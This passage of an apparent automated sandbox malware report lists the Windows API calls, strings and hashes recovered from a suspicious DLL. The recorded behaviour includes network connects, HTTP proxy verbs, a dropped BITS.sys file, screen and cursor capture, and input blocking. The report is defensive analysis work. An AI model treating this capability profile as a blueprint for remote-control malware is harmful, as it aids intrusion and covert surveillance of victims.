                                                    • Part of subcall function 10022C80: atoi.MSVCRT(?), ref: 10022CB9
                                                    • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                    • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                    • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                    • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                    • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSectioninet_addrsend$CreateEnterLeaveObjectSingleThreadWait_strnicmpatoiclosesocketconnecthtonssetsockoptsocket
                                                  • String ID: HTTP/1.0 200 OK
                                                  • API String ID: 599367761-2989790534
                                                  • Opcode ID: 1504ab6db776c2b976dbfc0d722819826677dc24a5412ddc79deb8b4ae1d556b
                                                  • Instruction ID: d01c3d8d1e42ec9e78ad2dd7fcbc3bb7af0e74a76ee1a4f2da6276a6e3bbdd91
                                                  • Opcode Fuzzy Hash: 1504ab6db776c2b976dbfc0d722819826677dc24a5412ddc79deb8b4ae1d556b
                                                  • Instruction Fuzzy Hash: 4841E135604205ABD760DBA4ED84FAB77E8EB84360F504B39F948D3284DA34ED45CBA2
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1002C0AA
                                                  • lstrlenA.KERNEL32 ref: 1002C0C9
                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 1002C0D2
                                                  • CloseHandle.KERNEL32(00000000), ref: 1002C0D9
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFileLibraryLoadProc$CloseCreateHandleWritelstrlen
                                                  • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                  • API String ID: 46210954-946259135
                                                  • Opcode ID: c1bc2c2478201faed0d3ea6f926608c4dbf94378b606a7168d56eee6f7a0415f
                                                  • Instruction ID: 82df5fe4f076fdc460b0368929330cb59a7ddbd3ad64e14f566ba4719a397f5f
                                                  • Opcode Fuzzy Hash: c1bc2c2478201faed0d3ea6f926608c4dbf94378b606a7168d56eee6f7a0415f
                                                  • Instruction Fuzzy Hash: 15115175104310AFE310DF18DC98BEBBBE9FB89710F444929FA48A7291DB745909CBA2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 100124D5
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 100124E3
                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 10012522
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 1001252D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                                  • String ID: closesocket$ws2_32.dll$Wu
                                                  • API String ID: 1041861973-2959226248
                                                  • Opcode ID: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                  • Instruction ID: 84a0c60808f6a2c03e40c6969a83a2f887d69962a4d8d2a11b52e44a2cc86ffd
                                                  • Opcode Fuzzy Hash: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                  • Instruction Fuzzy Hash: B0119EB55047459BC300DF28DC44B8AFBE8FF44760F400B29F86993390D77899548AA1
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 1000BB2D
                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 1000BB3B
                                                  • strstr.MSVCRT ref: 1000BB74
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1000BB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProcstrstr
                                                  • String ID: GetWindowTextA$user32.dll$Wu
                                                  • API String ID: 1147820842-3776163548
                                                  • Opcode ID: 04f329c70a298f015c30de5bf77217c16f7adc99adbac1e98e914c917f6df95c
                                                  • Instruction ID: 8c68ac7e4c2aeca86d41d5b223ca0fc2938b7ae066b174a2482fdab962876872
                                                  • Opcode Fuzzy Hash: 04f329c70a298f015c30de5bf77217c16f7adc99adbac1e98e914c917f6df95c
                                                  • Instruction Fuzzy Hash: 2DF09C395006107BF321DB2CCCC4BEB7BE8FFC5351F044924F94996254DBB99649C6A1
                                                  APIs
                                                    • Part of subcall function 10012560: EnterCriticalSection.KERNEL32(?,?,?,1001246B,?,00000001,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 1001256B
                                                    • Part of subcall function 10012560: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 10012585
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 100125F6
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012604
                                                  • FreeLibrary.KERNEL32(00000000), ref: 10012619
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                                  • String ID: 5$closesocket$ws2_32.dll$Wu
                                                  • API String ID: 2819327233-518943454
                                                  APIs
                                                  • _CxxThrowException.MSVCRT(?,100F59A0), ref: 10004DC3
                                                  • #823.MFC42(10004C7C,?,00000004,00000000,00000004,10004C8B,00000004,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10004E37
                                                  • #823.MFC42(00000000,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004E48
                                                  • #825.MFC42(00000000,00000000,?,?,?), ref: 10004EAE
                                                  • #825.MFC42(00000000,00000000,00000000,?,?,?), ref: 10004EB4
                                                  • _CxxThrowException.MSVCRT(?), ref: 10004ED1
                                                  • #825.MFC42(?,?,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004EDE
                                                  • #825.MFC42(10097CF0,?,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004EEE
                                                    • Part of subcall function 10004FA0: _ftol.MSVCRT ref: 10004FDF
                                                    • Part of subcall function 10004FA0: #823.MFC42(00000000), ref: 10004FE9
                                                  Similarity
                                                  • API ID: #825$#823$ExceptionThrow$_ftol
                                                  • String ID:
                                                  • API String ID: 3722084872-0
                                                  APIs
                                                    • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                    • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                    • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                  • GetCursorPos.USER32(?), ref: 10018E2A
                                                  • GetCursorInfo.USER32(?), ref: 10018E4B
                                                  • DestroyCursor.USER32(?), ref: 10018E74
                                                  • GetTickCount.KERNEL32 ref: 10018F68
                                                  • Sleep.KERNEL32(00000001), ref: 10018F7D
                                                  • GetTickCount.KERNEL32 ref: 10018F7F
                                                  • GetTickCount.KERNEL32 ref: 10018F8C
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10018F90
                                                  Similarity
                                                  • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                                  • String ID:
                                                  • API String ID: 3294368536-0
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015071
                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 100150A7
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100150E6
                                                  • #823.MFC42(?,?,?,?,00000000,000F003F,?), ref: 10015123
                                                  • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 10015178
                                                  • #825.MFC42(00000000), ref: 100151BD
                                                  • RegCloseKey.ADVAPI32(?), ref: 100151CA
                                                  • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100151D8
                                                  Similarity
                                                  • API ID: AllocLocal$#823#825CloseEnumInfoOpenQuery
                                                  • String ID:
                                                  • API String ID: 601778281-0
                                                  APIs
                                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A40F
                                                  • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A417
                                                  • memmove.MSVCRT(3B4208C4,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A439
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A44B
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A458
                                                  • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?,?,00000000,00000065), ref: 1000A460
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A497
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(3B4208C4,00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?), ref: 1000A4D8
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@memmove
                                                  • String ID:
                                                  • API String ID: 1074130261-0
                                                  Similarity
                                                  • API ID: _strnicmp
                                                  • String ID: CONNECT $GET $HEAD $POST
                                                  • API String ID: 2635805826-4031508290
                                                  Similarity
                                                  • API ID: sprintf$floor
                                                  • String ID: %.0f
                                                  • API String ID: 389794084-4293663076
                                                  APIs
                                                  • mbstowcs.MSVCRT ref: 1002533C
                                                  • NetUserGetLocalGroups.NETAPI32(00000000,?,00000000,00000001,?,000000FF,?,?,000000FF,75570440,1012C7F0), ref: 10025362
                                                  • wcslen.MSVCRT ref: 100253A2
                                                  • malloc.MSVCRT ref: 100253AA
                                                  • wsprintfA.USER32 ref: 100253BC
                                                  • strncpy.MSVCRT ref: 100253CD
                                                  • free.MSVCRT ref: 100253D4
                                                  Similarity
                                                  • API ID: GroupsLocalUserfreemallocmbstowcsstrncpywcslenwsprintf
                                                  • String ID:
                                                  • API String ID: 4292357205-0
                                                  APIs
                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 1002CAA5
                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAB9
                                                  • recv.WS2_32(?,?,00002000,00000000), ref: 1002CAD2
                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAFA
                                                  • recv.WS2_32(?,?,00002000,00000000), ref: 1002CB13
                                                  • closesocket.WS2_32 ref: 1002CB49
                                                  • closesocket.WS2_32(?), ref: 1002CB4C
                                                  Similarity
                                                  • API ID: closesocketrecv$select
                                                  • String ID:
                                                  • API String ID: 2008065562-0
APIs
• InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
• CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
• #823.MFC42(000001F0), ref: 100166B0
• #823.MFC42(000001F0), ref: 100166E1
  • Part of subcall function 10017D20: LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
• #823.MFC42(000001F0), ref: 10016708
• InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
Memory Dump Source (identical for every function in this snapshot)
• Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: #823$ExchangeInterlocked$CloseCursorHandleLoadObjectSingleWait
• String ID:
• API String ID: 3589420723-0
• Opcode ID: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
• Instruction ID: 712e268baaa8dd016a258d9f4d26cd7f4b70a444460d0a0c6ff612943e0d7f80
• Opcode Fuzzy Hash: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
• Instruction Fuzzy Hash: C331B274644704ABE720CB348C92FAA77E5FB4C714F000A2DF69A9A2C1DB75F580C752

APIs
• GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation), ref: 1002A022
• GetProcAddress.KERNEL32(00000000), ref: 1002A029
• _ftol.MSVCRT ref: 1002A12D
• Sleep.KERNEL32(000003E8), ref: 1002A15E
Similarity
• API ID: AddressHandleModuleProcSleep_ftol
• String ID: NtQuerySystemInformation$ntdll
• API String ID: 720640769-3593917365
• Opcode ID: 87c2df69d68b346a26dfd6ce31b5de41ecb273b8ff5a55da744687a68bfed4d7
• Instruction ID: 9ecdc30b395b3de615973ea4113061162ed042f46e2595d21880a83f2e24a0e0
• Opcode Fuzzy Hash: 87c2df69d68b346a26dfd6ce31b5de41ecb273b8ff5a55da744687a68bfed4d7
• Instruction Fuzzy Hash: 8541A5B5A083059FE310DF65DC85A8BB7E8FBC8750F418E2DF589E2210EF3099548B92

APIs
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000947B
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF), ref: 10009494
• GetFileSize.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094B7
• lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094C0
• LocalAlloc.KERNEL32(00000040,-0000000A,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094CE
• lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094FC
• LocalFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009524
Similarity
• API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
• String ID:
• API String ID: 2793549963-0
• Opcode ID: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
• Instruction ID: 308c1cce03677ded8cce1838fe27e550398bb3d797b3be4da8be1d4d23af97c4
• Opcode Fuzzy Hash: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
• Instruction Fuzzy Hash: 0D3108327002145BD714DE78DC95B9AB2D6FB88621F484639FE1AD73C0DAB5A805C660

APIs
• SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?), ref: 1000771C
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?,?), ref: 10007792
• SetFilePointer.KERNEL32(00000000,?,?,00000000,?,?), ref: 100077A7
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 100077C4
• CloseHandle.KERNEL32(00000000,?,?), ref: 100077CB
Similarity
• API ID: File$CloseCreateFolderHandlePathPointerSpecialWrite
• String ID: p
• API String ID: 2004626570-2181537457
• Opcode ID: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
• Instruction ID: 1e1907684de1c8bd89ee597228f05c738f3ecf463b7a0146f2a5c42f798544d2
• Opcode Fuzzy Hash: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
• Instruction Fuzzy Hash: 6331D7756447045BD318CA28CC45FABB796FBC8320F084B2DF95A972D0DAB49E05C751

APIs
  • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
  • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
  • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
  • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
  • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
• ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
• socket.WS2_32 ref: 10004A86
• gethostbyname.WS2_32(?), ref: 10004AA6
Similarity
• API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
• String ID:
• API String ID: 513860241-0
• Opcode ID: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
• Instruction ID: 92d35607f8033a3118f145dcfa9d89b9a917cf27699ac872a687df5e96afb08c
• Opcode Fuzzy Hash: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
• Instruction Fuzzy Hash: 0731CEB5244301AFE310DF28CC85FDB77E4FF85318F004A1DF2999A280DBB1A4888B66

APIs
• #939.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116CA
• #800.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116DB
• #6282.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116ED
• #535.MFC42(00000030,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116F9
• #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 1001173E
• #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011756
  • Part of subcall function 10011790: #540.MFC42 ref: 100117B7
  • Part of subcall function 10011790: #2818.MFC42(00000000, %c%s,?,?), ref: 100117E0
  • Part of subcall function 10011790: #2763.MFC42(00000020), ref: 100117FD
  • Part of subcall function 10011790: #537.MFC42(100FACDC,00000000,00000020), ref: 10011815
  • Part of subcall function 10011790: #537.MFC42(100FB4F0,100FACDC,00000000,00000020), ref: 1001182A
  • Part of subcall function 10011790: #922.MFC42(?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001183B
  • Part of subcall function 10011790: #922.MFC42(?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001184C
  • Part of subcall function 10011790: #939.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001185B
  • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011869
  • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011877
  • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011885
  • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011893
  • Part of subcall function 10011790: #535.MFC42(00000000), ref: 100118F0
  • Part of subcall function 10011790: #800.MFC42(00000000), ref: 10011906
• #536.MFC42(00000000,00000001,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011766
Similarity
• API ID: #800$#535$#537#922#939$#2763#2818#536#540#6282
• String ID:
• API String ID: 37758464-0
• Opcode ID: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
• Instruction ID: a387ab11639bd89c7a433ae959a7e4b16c1de711adbd724f1b563dcecc6c226d
• Opcode Fuzzy Hash: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
• Instruction Fuzzy Hash: 4F31B036304B509BC768DB19C980A5EB3E5FBC8660F844A2DF15A9B781CA34FD86CB51

APIs
• Sleep.KERNEL32(0000000A), ref: 1001790C
• SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1001792A
• PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1001793D
• SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10017959
• PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1001796C
  • Part of subcall function 100172E0: WaitForSingleObject.KERNEL32(?), ref: 10017309
  • Part of subcall function 100172E0: CloseHandle.KERNEL32(?), ref: 10017316
  • Part of subcall function 100172E0: #823.MFC42(00000110), ref: 1001733A
• BlockInput.USER32(?), ref: 1001797E
  • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000000), ref: 10017CD7
  • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000001), ref: 10017CE0
• BlockInput.USER32(00000000), ref: 100179B1
Similarity
• API ID: System$BlockInfoInputMessageMetricsParametersPost$#823CloseHandleObjectSingleSleepWait
• String ID:
• API String ID: 3920574744-0
• Opcode ID: a7218c19c575f0fa165b1dcca2438f82306912410485c68ab7919d5f89244cd7
• Instruction ID: 7daddea43cc9a70ef573584f8d8655afaff675511c2eeb1b5977463b5a020a2f
• Opcode Fuzzy Hash: a7218c19c575f0fa165b1dcca2438f82306912410485c68ab7919d5f89244cd7
• Instruction Fuzzy Hash: 0421F63438034421DA14EA340C83FE92766EF46750F101538F65E6F1C3CDB5E88A8624

APIs
